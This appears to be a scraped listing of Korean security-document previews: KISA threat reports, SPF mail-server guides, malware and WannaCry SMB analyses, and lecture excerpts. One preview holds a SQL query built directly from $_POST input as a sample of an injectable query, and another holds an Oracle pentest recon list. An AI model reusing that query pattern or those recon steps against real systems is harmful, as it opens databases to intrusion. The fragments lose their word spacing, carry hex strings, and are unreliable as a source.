More information<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707
최근정보보호위협과 침해사고동향 김홍석보안프로그램매니저고객지원부한국마이크로소프트 해킹으로부터안전하고 바이러스걱정도안하고 보안취약점염려도없이 컴퓨터를가장안전하게사용하는 방법은? 컴퓨터를네트워크에연결하지않고 CD, 디스켓, USB 메모리를사용하지않는다 한국정보보호진흥원 (KISA) 2006. 12. * 정보통신부 Dynamic u-korea 정보보호강화사업결과물
More information<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>
네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고
More information354-437-4..
357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail 8.13.4 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. sendmail, SPF
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More information메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환
취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer
More information유포지탐지동향
월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More information저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할
저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할수없습니다. 변경금지. 귀하는이저작물을개작, 변형또는가공할수없습니다. 귀하는, 이저작물의재이용이나배포의경우,
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information6강.hwp
----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2
월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황
More informationPowerPoint Presentation
Zeroday-worm ( 침해사고유형및발전 ) 2005.3 보안서비스사업본부전상훈과장 ( 바다란 ). 중앙관제센터 / MAIN CERT 인포섹 winsnort@skinfosec.co.kr OR p4ssion@gmail.com 목차 개요 공격유형의변화 Why Zeroday-worm? Web Hacking 유형-ex 결론및대안 개요 1. 침해사고환경의급변 2.
More information운영체제실습_명령어
운영체제실습 리눅스네트워크기본개념및설정 서 기옥 Contents 네트워크용어정의 IP 주소 네트워크기본명령어 네트워크관리명령어 네트워크설정파일 telnet 서버설정 네트워크용어정의 네트워크 (Network) : 전자적으로데이터를주고받기위한목적으로연결된 2 개이상의컴퓨터시스템 IP 주소와 Ethernet 주소 IP 주소 : 네트워크에연결된시스템을구분하는소프트웨어적인주소
More information08_spam.hwp
1. 개요 최근국내외에서 E-card 발송을가장한스팸메일로인하여악성코드에감염되는피해가다수보고되었다. 악성코드는메일본문에악의적인 URL을삽입및클릭을유도하는방식으로스팸메일을발송한다. 사용자가스팸메일에포함되어있는악성URL을클릭할경우감염될수있으며, 감염후에는악성코드가감염PC내에저장되어있는메일주소들을추출하여해당주소로동일유형의스팸메일을발송하게된다. 또한, P2P를통한명령전달및추가악성코드다운로드등의악성행위가예상되므로사용자는
More information메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix 2.7.1 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. postfix,
More informationㅇ악성코드 분석
기술문서 2016-10-25 프로젝트 최종보고서 작성자 : 프로젝트 KITRI 제 13 기모의해킹과정 김남용 2 개정이력 개정번호개정내용요약개정일자 1.0 최초제정승인 2016-10-25 1.1 단어수정 2016-10-25 문서규칙 quiz 프로젝트최종보고서 첨부파일버젂문서최종수정일 1 2 3 4 작성및확인은 Microsoft Word 2007으로작성되어졌으며,
More informationuntitled
디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More information<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>
목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...
More information2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1
악성코드은닉사이트탐지 동향보고서 17 년상반기 1 ` 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 4 2.1 악성코드유포지현황 4 - 유포지탐지현황 4 - 대량경유지가탐지된유포지 TOP10 5 - 악성코드취약점및취약한 S/W 악용현황 6 - 악성코드유형별비율 7 - 위협 IP 및도메인현황 8 2.2 악성코드경유지현황 9 - 경유지탐지 업종별비율
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More informationDDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS
DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.
More information월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호
안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More information1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3
CR-15-59 AhnLab Policy Center 4.6 for Windows 인증보고서 인증번호 : ISIS-0631-2015 2015년 7월 IT보안인증사무국 1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정
More informationMicrosoft PowerPoint - 권장 사양
Autodesk 제품컴퓨터사양 PRONETSOFT.CO 박경현 1 AutoCAD 시스템사양 시스템요구사양 32 비트 AutoCAD 2009 를위한시스템요구사항 Intel Pentium 4 프로세서 2.2GHz 이상, 또는 Intel 또는 AMD 듀얼 코어프로세서 16GH 1.6GHz 이상 Microsoft Windows Vista, Windows XP Home
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2014. 03. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 15 3. 악성코드은닉사례분석
More informationContents 월간동향요약 2. 침해사고통계분석 3 -. 증감추이 ( 전월대비 ) 3-2. 침해사고통계요약 3-3. 침해사고통계현황 4 웜 바이러스신고건수추이 주요웜 바이러스별현황 -4. 해킹 6 해킹사고접수처리건수추이 피해기관별분류 피해운영체제별분류 피싱경유지신고처
Contents 월간동향요약 2. 침해사고통계분석 3 -. 증감추이 ( 전월대비 ) 3-2. 침해사고통계요약 3-3. 침해사고통계현황 4 웜 바이러스신고건수추이 주요웜 바이러스별현황 -4. 해킹 6 해킹사고접수처리건수추이 피해기관별분류 피해운영체제별분류 피싱경유지신고처리현황 홈페이지변조사고처리현황 악성봇 (Bot) 현황 2. 허니넷 / 트래픽분석 3 2-.
More informationMicrosoft PowerPoint - ch02_인터넷 이해와 활용.ppt
컴퓨터 활용과 실습 원리를 알면 IT가 맛있다 chapter 2. 윈도우XP, 한글25, 엑셀23, 파워포인트23 인터넷 이해와 활용 www.hanb.co.kr -1- 학습목표 목차 통신과 네트워크의 개념 통신과 네트워크 컴퓨터 통신망 인터넷정의및역사 인터넷주소체계 인터넷 정의와 역사 인터넷 주소 웹서비스의정의및특징 웹 서비스 웹 브라우저의 기능 웹 브라우저
More information2-11Àå
Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,
More information. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 -
Quick Network Setup Guide xdsl/cable Modem PC DVR ~3.., PC, DVR. Cable IP Cable/ADSL/ VDSL or 3 4 VIDEO OUT (SPOT) AUDIO IN VGA ALARM OUT COM ALARM IN RS-485 3 4 G G + 3 CONSOLE NETWORK DC V VIDEO IN VIDEO
More informationESET Endpoint Security
ESET ENDPOINT SECURITY 사용자 설명서 Microsoft Windows 8 / 7 / Vista / XP / 2000 / Home Server 이 문서의 최신 버전을 다운로드하려면 여기를 클릭 ESET ENDPOINT SECURITY Copyright 2013 by ESET, spol. s r. o. ESET Endpoint Security는
More information최종_백서 표지
정보보호 활동 제 제 제 제 제 제 장 장 장 장 장 장 인터넷 침해사고 대응 및 예방 활동 정보통신서비스 제공자 등의 정보보호 주요정보통신기반시설 보호 활동 전자정부 정보보호 활동 개인정보보호 활동 대국민 정보보호 활동 제 장 웹서버 파괴 및 대북 보수단체 홈페이지 14개의 자료가 삭제되는 등의 큰 피해로 이어졌다. 한편 6월 25일부터 정부기관, 언론사,
More information2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp
MS06-040 웜(wgareg.exe) 분석 1. 개요 2. 전파 방법 (그림) browser를 오픈 요청 (그림) srvsvc 에 대한 요청 (그림) Exploit 과정 (그림) 웜 전송 3. 감염 시 악성 기능 (그림) 감염 시 개인방화벽 OFF 예 4. 타 시스템 감염을 위한 공격력 5. 위험 요소 6. 사전 예방 방법 7. 감염 시 치료 방법
More information07_alman.hwp
1. 개요 Alman 바이러스는국내에서감염피해가다수보고되었다. 여기서는 Alman 바이러스변종 에감염될경우의악성기능에대하여살펴보았다. Alman은감염된시스템내의실행파일들을추가로감염시킨다. 타시스템사용자가감염된실행파일들을감염여부를확인하지않고복사하여사용할경우감염되게된다. 또한, 네트워크공유폴더와이동디스크를통하여전파되므로, 윈도우암호와공유폴더암호를추측하기어렵게설정하고주기적으로이동저장매체에대한백신점검을실시하는것이필요하다.
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information<41736D6C6F D20B9AEBCADBEE7BDC42E687770>
IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.
More information<C0FCBACFB4EBC7D0B1B320C5E4B8F1B0F8C7D0B0FA20C0A5BCADB9F620BBE7B0EDBAD0BCAE2E687770>
전북대학교토목공학과웹서버사고분석 2008. 7. 31 전북대학교정보보안동아리 IS 신승용 (player0@chonbuk.ac.kr) 전북대학교토목공학과웹서버사고분석 1 of 9 07/31/2008 1. 시스템정보 주소 : civil.chonbuk.ac.kr (203.254.141.29) 소프트웨어환경 OS : Debian 3.0 (Woody : 2007.07.20)
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More informationFileMaker 15 WebDirect 설명서
FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.
More informationPowerPoint 프레젠테이션
B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10
More informationSecure Programming Lecture1 : Introduction
해킹및침해대응 Lecture2 침해사고동향 보안위협의증대 APT 를기반으로하는기업 / 기관을대상으로하는공격이지속적으로발생 : ADD, MND, 한수원등 DDoS 공격의지속적인발생, 공격목적의변화 서비스거부해제를위한금품요구 사회혼란, 정치적목적 공공기관사칭피싱사이트증가 금융, 게임, 포털 검찰청, 경찰청, 금감원 추가적으로모바일형태의피싱사이트증가 주요인기키워드및사회이슈를활용한악성코드배포
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More informationUDP Flooding Attack 공격과 방어
황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More informationSKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc
SKInfosec-Tech-005 China Bot( 가칭 ) 악성코드분석 한상흠, 황교국 (m4gichack@gmail.com, fullc0de@gmail.com) SK Infosec Co., Inc MSS 사업본부침해대응팀 Table of Contents 1. 개요...3 2. MSSQL2005 취약점...4 3. 악성코드분석...7 3.1. 0.js...8
More information..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A
..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * Amazon Web Services, Inc.. ID Microsoft Office 365*
More informationMicrosoft PowerPoint - thesis_rone.ppt
엔터프라이즈네트워크에서인터넷웜의실시간탐지방법 포항공과대학교정보통신대학원정보통신학과 분산시스템과네트워크관리연구실 2005 년 12 월 21 일 조룡권 rone@postech.ac.kr 목차 서론 연구의필요성과목표 관련연구 인터넷웜탐지알고리즘 웜트래픽발생툴 알고리즘의검증 네트워크에서의탐지결과분석 결론 (2) 서론 (1) 인터넷웜은전파속도가빠르고네트워크의마비를일으킴
More informationHLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :
HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,
More information- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨
QnA 형식으로알아보는 WannaCry 랜섬웨어 대응가이드 2017. 05 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. - 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요?
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해및안전한관리 - 개인 PC 및스마트폰개인정보보호 - 2012. 12. 12 최윤형 ( 한국정보화진흥원 ) 1 안전한개인 PC 관리방법 목 차 2 안전한스마트폰관리방법 1. 안전한개인 PC 관리방법 정보통신기기의보안위협요인 웜, 바이러스, 악성코드, DDos 공격침입, 네트워크공격 휴대성, 이동성오픈플랫폼 3G, WiFi, Wibro 등 웜,
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More informationBEA_WebLogic.hwp
